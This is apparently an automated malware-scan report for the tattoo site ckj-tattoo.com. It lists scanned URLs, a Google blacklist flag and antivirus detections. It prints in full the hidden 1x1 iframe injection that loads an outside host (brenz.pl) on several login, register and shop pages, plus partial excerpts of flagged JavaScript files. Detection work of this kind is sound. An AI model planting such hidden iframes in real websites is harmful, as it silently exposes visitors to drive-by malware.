New scan:

Malware Scanner report for ckj-tattoo.com

Malicious/Suspicious/Total urls checked
4/0/15
4 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "ckj-tattoo.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/4/4
4 suspicious iframes found. See details below
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=ckj-tattoo.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://www.ckj-tattoo.com/
200 OK
Content-Length: 70133
Content-Type: text/html
clean
http://l.tbcdn.cn/apps/top/x/sdk.js?appkey=21207373
200 OK
Content-Length: 30014
Content-Type: application/x-javascript
clean
http://www.ckj-tattoo.com/data/js/index_index_4204081708.js
200 OK
Content-Length: 214238
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cv(a){if(!ck[a]){var b=c.body,d=f("<"+a+">").appendTo(b),e=d.css("display");d.remove();if(e==="none"||e===""){cl||(cl=c.createElement("iframe"),cl.frameBorder=cl.width=cl.height=0),b.appendChild(cl);if(!cm||!cl.createElement)cm=(cl.contentWindow||cl.contentDocument).document,cm.write((c.compatMode==="CSS1Compat"?"<!doctype html>":"")+"<html><body>"),cm.close();d=c
... 3475 bytes are skipped ...
ightBox,#jumpbox').hide();
}
function jumpboxOpen(contain,height,width){
var domObject=new Object();
domObject.id='jumpbox';
domObject.title='';
domObject.titlebg=0;
domObject.height=height;
domObject.width=width;
domObject.background='';
addJumpBoxDom(domObject);
jumpBoxInitialize(domObject);
$('#LightBox,#jumpbox').show();
if(contain!=''){
$('#' + domObject.id + ' .contain').html(contain);
}
}

Antivirus reports:

Bkav
W32.HfsIframe.2ff4

http://www.ckj-tattoo.com/template/red_1/js/jquery.KinSlideshow-1.2.1.min.js
200 OK
Content-Length: 16825
Content-Type: application/x-javascript
clean
http://www.ckj-tattoo.com/template/red_1/js/index.js
200 OK
Content-Length: 2897
Content-Type: application/x-javascript
clean
http://www.ckj-tattoo.com/index.php?mod=user&act=login
200 OK
Content-Length: 20867
Content-Type: text/html
suspicious
Hidden iFrame found.
size: 1x1     
src: http://www.brenz.pl/rc/

<iframe style="height:1px" src="http://www&#46;brenz.pl/rc/" frameborder=0 width=1>

http://www.ckj-tattoo.com/data/js/user_login_4204081708.js
200 OK
Content-Length: 214238
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cv(a){if(!ck[a]){var b=c.body,d=f("<"+a+">").appendTo(b),e=d.css("display");d.remove();if(e==="none"||e===""){cl||(cl=c.createElement("iframe"),cl.frameBorder=cl.width=cl.height=0),b.appendChild(cl);if(!cm||!cl.createElement)cm=(cl.contentWindow||cl.contentDocument).document,cm.write((c.compatMode==="CSS1Compat"?"<!doctype html>":"")+"<html><body>"),cm.close();d=c
... 3475 bytes are skipped ...
ightBox,#jumpbox').hide();
}
function jumpboxOpen(contain,height,width){
var domObject=new Object();
domObject.id='jumpbox';
domObject.title='';
domObject.titlebg=0;
domObject.height=height;
domObject.width=width;
domObject.background='';
addJumpBoxDom(domObject);
jumpBoxInitialize(domObject);
$('#LightBox,#jumpbox').show();
if(contain!=''){
$('#' + domObject.id + ' .contain').html(contain);
}
}

Antivirus reports:

Bkav
W32.HfsIframe.2ff4

http://www.ckj-tattoo.com/js/jquery.validate.js
200 OK
Content-Length: 34193
Content-Type: application/x-javascript
clean
http://www.ckj-tattoo.com/index.php?mod=user&act=register
200 OK
Content-Length: 26240
Content-Type: text/html
suspicious
Hidden iFrame found.
size: 1x1     
src: http://www.brenz.pl/rc/

<iframe style="height:1px" src="http://www&#46;brenz.pl/rc/" frameborder=0 width=1>

http://www.ckj-tattoo.com/data/js/user_register_4204081708.js
200 OK
Content-Length: 214238
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cv(a){if(!ck[a]){var b=c.body,d=f("<"+a+">").appendTo(b),e=d.css("display");d.remove();if(e==="none"||e===""){cl||(cl=c.createElement("iframe"),cl.frameBorder=cl.width=cl.height=0),b.appendChild(cl);if(!cm||!cl.createElement)cm=(cl.contentWindow||cl.contentDocument).document,cm.write((c.compatMode==="CSS1Compat"?"<!doctype html>":"")+"<html><body>"),cm.close();d=c
... 3475 bytes are skipped ...
ightBox,#jumpbox').hide();
}
function jumpboxOpen(contain,height,width){
var domObject=new Object();
domObject.id='jumpbox';
domObject.title='';
domObject.titlebg=0;
domObject.height=height;
domObject.width=width;
domObject.background='';
addJumpBoxDom(domObject);
jumpBoxInitialize(domObject);
$('#LightBox,#jumpbox').show();
if(contain!=''){
$('#' + domObject.id + ' .contain').html(contain);
}
}

Antivirus reports:

Bkav
W32.HfsIframe.2ff4

http://www.ckj-tattoo.com/index.php?mod=help&act=index
200 OK
Content-Length: 30831
Content-Type: text/html
suspicious
Hidden iFrame found.
size: 1x1     
src: http://www.brenz.pl/rc/

<iframe style="height:1px" src="http://www&#46;brenz.pl/rc/" frameborder=0 width=1>

http://www.ckj-tattoo.com/data/js/help_index_4204081708.js
200 OK
Content-Length: 214238
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cv(a){if(!ck[a]){var b=c.body,d=f("<"+a+">").appendTo(b),e=d.css("display");d.remove();if(e==="none"||e===""){cl||(cl=c.createElement("iframe"),cl.frameBorder=cl.width=cl.height=0),b.appendChild(cl);if(!cm||!cl.createElement)cm=(cl.contentWindow||cl.contentDocument).document,cm.write((c.compatMode==="CSS1Compat"?"<!doctype html>":"")+"<html><body>"),cm.close();d=c
... 3475 bytes are skipped ...
ightBox,#jumpbox').hide();
}
function jumpboxOpen(contain,height,width){
var domObject=new Object();
domObject.id='jumpbox';
domObject.title='';
domObject.titlebg=0;
domObject.height=height;
domObject.width=width;
domObject.background='';
addJumpBoxDom(domObject);
jumpBoxInitialize(domObject);
$('#LightBox,#jumpbox').show();
if(contain!=''){
$('#' + domObject.id + ' .contain').html(contain);
}
}

Antivirus reports:

Bkav
W32.HfsIframe.2ff4

http://www.ckj-tattoo.com/index.php?mod=user&act=shoutu
200 OK
Content-Length: 183
Content-Type: text/html
clean
http://www.ckj-tattoo.com/test404page.js
404 Not Found
Content-Length: 1308
Content-Type: text/html
clean
http://www.ckj-tattoo.com/index.php?mod=mall&act=list
200 OK
Content-Length: 68355
Content-Type: text/html
suspicious
Hidden iFrame found.
size: 1x1     
src: http://www.brenz.pl/rc/

<iframe style="height:1px" src="http://www&#46;brenz.pl/rc/" frameborder=0 width=1>


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: ckj-tattoo.com

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: ckj-tattoo.com
Referer: http://www.google.com/search?q=ckj-tattoo.com

Result:
The result is similar to the first query. There are no suspicious redirects found.